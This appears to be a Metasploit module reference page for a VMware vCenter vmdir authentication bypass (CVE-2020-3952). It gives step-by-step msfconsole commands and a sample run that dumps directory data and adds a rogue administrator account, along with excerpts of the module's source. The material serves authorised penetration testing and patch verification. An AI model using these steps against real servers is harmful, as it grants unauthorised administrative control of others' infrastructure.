VMware vCenter Server vmdir Authentication Bypass - Metasploit

This page contains detailed information about how to use the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: VMware vCenter Server vmdir Authentication Bypass
Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
Source code: modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
Disclosure date: 2020-04-09
Last modification time: 2022-01-12 16:51:40 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 636
List of CVEs: CVE-2020-3952

This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, only if upgraded from a previous release line, such as 6.0 or 6.5.

Module Ranking and Traits

Module Ranking:

• normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

• service-resource-loss: Module may cause a resource (such as a file or data in a database) to be unavailable for the service.

Side Effects:

• ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
• config-changes: Module modifies some configuration setting on the target machine.

Basic Usage

msf > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show targets
    ... a list of targets ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > set TARGET target-id
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > show options
    ... show and set options ...
msf auxiliary(vmware_vcenter_vmdir_auth_bypass) > exploit

Required Options

• RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

• CheckModule: Module to check with

Knowledge Base

msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options

Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BASE_DN                    no        LDAP base DN if you already have it
   PASSWORD                   no        Password of admin user to add
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     636              yes       The target port
   SSL       true             no        Enable SSL on the LDAP connection
   USERNAME                   no        Username of admin user to add


Auxiliary action:

   Name  Description
   ----  -----------
   Add   Add an admin user


msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
username => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
password => msfadmin
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
[*] Running module against [redacted]
not verifying SSL hostname of LDAPS server '[redacted]:636'

[*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
dn: cn=DSE Root
namingcontexts: dc=vsphere,dc=local
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
supportedcontrol: 1.2.840.113556.1.4.417
supportedcontrol: 1.2.840.113556.1.4.319
supportedldapversion: 3
supportedsaslmechanisms: GSSAPI

[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at [redacted]:636
[+] [redacted]:636 is vulnerable to CVE-2020-3952
[*] Storing LDAP data in loot
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
[*] Password and lockout policy:
vmwpasswordchangeautounlockintervalsec: [redacted]
vmwpasswordchangefailedattemptintervalsec: [redacted]
vmwpasswordchangemaxfailedattempts: [redacted]
vmwpasswordlifetimedays: [redacted]
vmwpasswordmaxidenticaladjacentchars: [redacted]
vmwpasswordmaxlength: [redacted]
vmwpasswordminalphabeticcount: [redacted]
vmwpasswordminlength: [redacted]
vmwpasswordminlowercasecount: [redacted]
vmwpasswordminnumericcount: [redacted]
vmwpasswordminspecialcharcount: [redacted]
vmwpasswordminuppercasecount: [redacted]
vmwpasswordprohibitedpreviouscount: [redacted]

[+] Credentials found: [redacted]
[snip]
[*] Bypassing LDAP auth in vmdir service at [redacted]:636
[*] Adding admin user msfadmin with password msfadmin
[+] Added user msfadmin, so auth bypass was successful!
[+] Added user msfadmin to admin group
[*] Auxiliary module execution completed
msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >

Go back to menu.

Msfconsole Usage

Here is how the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show info

       Name: VMware vCenter Server vmdir Authentication Bypass
     Module: auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-04-09

Provided by:
  Hynek Petrak
  JJ Lehmann
  Ofri Ziv
  wvu <[email protected]>

Module side effects:
 ioc-in-logs
 config-changes

Module stability:
 service-resource-loss

Available actions:
  Name  Description
  ----  -----------
  Add   Add an admin user

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  BASE_DN                    no        LDAP base DN if you already have it
  BIND_DN                    no        The username to authenticate to LDAP server
  BIND_PW                    no        Password for the BIND_DN
  PASSWORD                   no        Password of admin user to add
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     636              yes       The target port
  SSL       true             no        Enable SSL on the LDAP connection
  USERNAME                   no        Username of admin user to add

Description:
  This module bypasses LDAP authentication in VMware vCenter Server's 
  vmdir service to add an arbitrary administrator user. Version 6.7 
  prior to the 6.7U3f update is vulnerable, only if upgraded from a 
  previous release line, such as 6.0 or 6.5.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-3952
  https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
  https://www.vmware.com/security/advisories/VMSA-2020-0006.html

Module Options

This is a complete list of options available in the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show options

Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BASE_DN                    no        LDAP base DN if you already have it
   BIND_DN                    no        The username to authenticate to LDAP server
   BIND_PW                    no        Password for the BIND_DN
   PASSWORD                   no        Password of admin user to add
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     636              yes       The target port
   SSL       true             no        Enable SSL on the LDAP connection
   USERNAME                   no        Username of admin user to add

Auxiliary action:

   Name  Description
   ----  -----------
   Add   Add an admin user

Advanced Options

Here is a complete list of advanced options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module:

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show advanced

Module advanced options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

   Name                  Current Setting                             Required  Description
   ----                  ---------------                             --------  -----------
   CheckModule           auxiliary/gather/vmware_vcenter_vmdir_ldap  yes       Module to check with
   LDAP::ConnectTimeout  10.0                                        yes       Timeout for LDAP connect
   VERBOSE               false                                       no        Enable detailed status messages
   WORKSPACE                                                         no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/ldap/vmware_vcenter_vmdir_auth_bypass module can do:

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   Add   Add an admin user

Evasion Options

Here is the full list of possible evasion options supported by the admin/ldap/vmware_vcenter_vmdir_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Please set the USERNAME and PASSWORD options to proceed

Here is a relevant code snippet related to the "Please set the USERNAME and PASSWORD options to proceed" error message:

75:	    "cn=Administrators,cn=Builtin,#{base_dn}"
76:	  end
77:	
78:	  def run
79:	    unless username && password
80:	      print_error('Please set the USERNAME and PASSWORD options to proceed')
81:	      return
82:	    end
83:	
84:	    # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap
85:	    checkcode = check

Failed to add admin user <USERNAME>

Here is a relevant code snippet related to the "Failed to add admin user <USERNAME>" error message:

98:	      auth_bypass(ldap)
99:	
100:	      print_status("Adding admin user #{username} with password #{password}")
101:	
102:	      unless add_admin(ldap)
103:	        print_error("Failed to add admin user #{username}")
104:	      end
105:	    end
106:	  rescue Net::LDAP::Error => e
107:	    print_error("#{e.class}: #{e.message}")
108:	  end

Failed to bypass LDAP auth in vmdir service

Here is a relevant code snippet related to the "Failed to bypass LDAP auth in vmdir service" error message:

132:	    unless ldap.add(dn: user_dn, attributes: user_info)
133:	      res = ldap.get_operation_result
134:	
135:	      case res.code
136:	      when Net::LDAP::ResultCodeInsufficientAccessRights
137:	        print_error('Failed to bypass LDAP auth in vmdir service')
138:	      when Net::LDAP::ResultCodeEntryAlreadyExists
139:	        print_error("User #{username} already exists")
140:	      when Net::LDAP::ResultCodeConstraintViolation
141:	        print_error("Password #{password} does not meet policy requirements")
142:	      else

User <USERNAME> already exists

Here is a relevant code snippet related to the "User <USERNAME> already exists" error message:

134:	
135:	      case res.code
136:	      when Net::LDAP::ResultCodeInsufficientAccessRights
137:	        print_error('Failed to bypass LDAP auth in vmdir service')
138:	      when Net::LDAP::ResultCodeEntryAlreadyExists
139:	        print_error("User #{username} already exists")
140:	      when Net::LDAP::ResultCodeConstraintViolation
141:	        print_error("Password #{password} does not meet policy requirements")
142:	      else
143:	        print_error("#{res.message}: #{res.error_message}")
144:	      end

Password <PASSWORD> does not meet policy requirements

Here is a relevant code snippet related to the "Password <PASSWORD> does not meet policy requirements" error message:

136:	      when Net::LDAP::ResultCodeInsufficientAccessRights
137:	        print_error('Failed to bypass LDAP auth in vmdir service')
138:	      when Net::LDAP::ResultCodeEntryAlreadyExists
139:	        print_error("User #{username} already exists")
140:	      when Net::LDAP::ResultCodeConstraintViolation
141:	        print_error("Password #{password} does not meet policy requirements")
142:	      else
143:	        print_error("#{res.message}: #{res.error_message}")
144:	      end
145:	
146:	      return false

User <USERNAME> is already an admin

Here is a relevant code snippet related to the "User <USERNAME> is already an admin" error message:

151:	    # Add our user to the admin group
152:	    unless ldap.add_attribute(group_dn, 'member', user_dn)
153:	      res = ldap.get_operation_result
154:	
155:	      if res.code == Net::LDAP::ResultCodeAttributeOrValueExists
156:	        print_error("User #{username} is already an admin")
157:	      else
158:	        print_error("#{res.message}: #{res.error_message}")
159:	      end
160:	
161:	      return false

Go back to menu.

Related Pull Requests

• #14734 Merged Pull Request: Rubocop recently landed modules
• #13885 Merged Pull Request: Add LDAPS support and update VMware vCenter Server vmdir (CVE-2020-3952) modules
• #13868 Merged Pull Request: Add hash dumping to auxiliary/gather/vmware_vcenter_vmdir_ldap (CVE-2020-3952)
• #13503 Merged Pull Request: Add BASE_DN and ROOT_KEY options to VMware vCenter vmdir and SaltStack Salt modules
• #13253 Merged Pull Request: Add VMware vCenter Server vmdir Information Disclosure and Authentication Bypass (CVE-2020-3952), plus LDAP mixin

References

• CVE-2020-3952
• https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
• https://www.vmware.com/security/advisories/VMSA-2020-0006.html

See Also

Check also the following modules related to this module:

• auxiliary/gather/ldap_hashdump
• auxiliary/gather/vmware_vcenter_vmdir_ldap
• auxiliary/admin/ldap/rbcd
• auxiliary/scanner/vmware/vmware_enum_permissions
• auxiliary/scanner/vmware/vmware_enum_sessions
• auxiliary/scanner/vmware/vmware_enum_users
• auxiliary/scanner/vmware/vmware_enum_vms
• auxiliary/scanner/vmware/vmware_host_details
• auxiliary/scanner/vmware/vmware_http_login
• auxiliary/scanner/vmware/vmware_screenshot_stealer
• auxiliary/scanner/vmware/vmware_server_dir_trav
• auxiliary/scanner/vmware/vmware_update_manager_traversal
• exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
• exploit/linux/http/vmware_vcenter_analytics_file_upload
• exploit/linux/http/vmware_vcenter_vsan_health_rce
• exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
• exploit/linux/http/vmware_vrops_mgr_ssrf_rce
• exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
• exploit/linux/local/vmware_alsa_config
• exploit/linux/local/vmware_mount
• exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
• exploit/linux/ssh/vmware_vdp_known_privkey
• exploit/multi/http/vmware_vcenter_log4shell
• exploit/multi/http/vmware_vcenter_uploadova_rce
• exploit/osx/local/vmware_bash_function_root
• exploit/osx/local/vmware_fusion_lpe
• exploit/windows/http/vmware_vcenter_chargeback_upload
• auxiliary/admin/vmware/poweroff_vm
• auxiliary/admin/vmware/poweron_vm
• auxiliary/admin/vmware/tag_vm
• auxiliary/admin/vmware/terminate_esx_sessions
• auxiliary/admin/vmware/vcenter_forge_saml_token
• auxiliary/admin/vmware/vcenter_offline_mdb_extract
• exploit/windows/ldap/imail_thc
• exploit/windows/ldap/pgp_keyserver7

Authors

• Hynek Petrak
• JJ Lehmann
• Ofri Ziv
• wvu

Version

This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.